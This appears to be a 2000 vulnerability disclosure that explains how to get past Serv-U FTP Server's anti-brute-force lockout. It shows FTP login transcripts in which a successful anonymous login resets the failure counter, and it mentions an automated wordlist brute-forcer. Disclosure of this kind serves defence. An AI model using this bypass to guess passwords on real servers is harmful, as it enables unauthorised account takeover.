Title: Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) mode
Released by: Craig
Date: 30th October 2000

Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) mode

-----------------------------------------------------------------------------

While playing around with Serv-U FTP Server, I found that it is possible to
bypass its hammering protection, which is meant to protect accounts from being
brute-forced. The following text explains this step by step.

A user logs into an FTP server like this:

USER USERNAME
PASS PASSWORD

When the user has entered an invalid password three times he is disconnected
and is not allowed to connect again for a specified time. So far so good, but
I wondered what would happen if I switched to another user's account, in order
to try three passwords for every user per connection (lines with the prefix
">" are from the server):

USER USER1
>331 User name okay, need password.
PASS PASSWORD
>530 Not logged in.

USER USER1
>331 User name okay, need password.
PASS nextpassPASSWORD
>530 Not logged in.

USER USER2
>331 User name okay, need password.
PASS anotherPASSWORD
>530 Not logged in.

I was disconnected, and was already about to give up when I noticed that
anonymous login was enabled:

USER USER1
>331 User name okay, need password.
PASS PASSWORD
>530 Not logged in.

USER USER1
>331 User name okay, need password.
PASS nextpassPASSWORD
>530 Not logged in.

USER anonymous
>331 User name okay, please send complete E-mail address as password.
PASS somemail@address.com
>230 User logged in, proceed.

USER USER1
>331 User name okay, need password.
PASS 3rdPASSWORD
>530 Not logged in.

USER USER1
>331 User name okay, need password.
PASS 4thPASSWORD
>530 Not logged in.

...

BINGO! That worked!

This does not only work with anonymous access: you just need to log into some
account successfully, and afterwards you can go on trying the target user's
account on the same connection.

I coded a little program in Java to automate the brute-forcing process; it
reads the passwords from a wordlist. In my local network it tested about 100
passwords per minute. That is not very fast, but it only uses one connection,
and as far as I know it is the only tool that bypasses the anti brute-force
function...

Brutus-aet2 (with 10 connections, 10 ms timeout and, of course, anti-hammering
disabled) made 20 tries per second. My program is only single-threaded, but if
its method were implemented in brutus-aet3 it might be the fastest FTP
brute-force tool ever :)

- Craig
Craig@Freenet.de
http://www.HaQuarter.De (only German yet)
Download Brutus at http://www.hobbie.net/brutus

P.S.: Before writing this, I did a quick search at SecurityFocus, but I did
not find anything about this issue. If this was already known, I am sorry for
wasting your time!